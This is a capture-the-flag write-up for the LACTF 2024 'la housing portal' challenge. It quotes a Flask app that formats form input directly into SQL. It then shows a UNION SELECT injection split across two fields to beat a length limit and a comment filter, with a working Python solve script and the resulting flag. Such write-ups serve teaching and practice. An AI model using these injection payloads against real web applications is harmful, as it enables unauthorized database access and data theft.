la housing portal

LACTF 2024
,

solved by hartmannsyg

We see an SQL injection vulnerability here:

app.py
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
@app.route("/submit", methods=["POST"])
def search_roommates():
    data = request.form.copy()

    if len(data) > 6:
        return "Invalid form data", 422
    
    
    for k, v in list(data.items()):
        if v == 'na':
            data.pop(k)

        if (len(k) > 10 or len(v) > 50) and k != "name":

            return "Invalid form data", 422
        if "--" in k or "--" in v or "/*" in k or "/*" in v:
            return render_template("hacker.html")
        
    name = data.pop("name")

    
    roommates = get_matching_roommates(data)
    return render_template("results.html", users = roommates, name=name)
    

def get_matching_roommates(prefs: dict[str, str]):
    if len(prefs) == 0:
        return []
    query = """
    select * from users where {} LIMIT 25;
    """.format(

        " AND ".join(["{} = '{}'".format(k, v) for k, v in prefs.items()])

    )
    print(query)

So we can try a UNION SELECT sql injection

select * from users where guests = ''UNION SELECT "a",*,"a","a","a","a"FROM flag WHERE ''='' LIMIT 25;

However, 'UNION SELECT "a",*,"a","a","a","a"FROM flag WHERE ''=' is too long (>50 chars)

(We need all the other “a”s to make sure that our other SELECT statement also has 6 columns (same as the user table) so that we can UNION it together with the user table)

So instead I got around this bypass but using two fields:

where guests = ''UNION SELECT "a",*,"a","a","a","a"FROM flag WHERE' AND neatness = '!='' LIMIT 25;
solve.py
1
2
3
4
5
6
7
8
9
10
import requests

data = {
    "name": "A",
    "guests": """'UNION SELECT"a",*,"a","a","a","a"FROM flag WHERE""",
    "neatness": "!='"
}

res = requests.post('https://la-housing.chall.lac.tf/submit',data)
print(res.text)

We get

<h2>Result for A:</h2>
<table id="data" class="table table-striped">
  <thead>
    <tr>
      <th>Name</th>
      <th>Guests</th>
      <th>Neatness</th>
      <th>Sleep time</th>
      <th>Awake time</th>
    </tr>
  </thead>
  <tbody>

    <tr>

      <td>lactf{us3_s4n1t1z3d_1npu7!!!}</td>

      <td>a</td>
      <td>a</td>
      <td>a</td>
      <td>a</td>
    </tr>

  </tbody>
</table>
<a href="/">Back</a>

<style>
  * {
    border: 1px solid black; border-collapse: collapse;
  }
</style>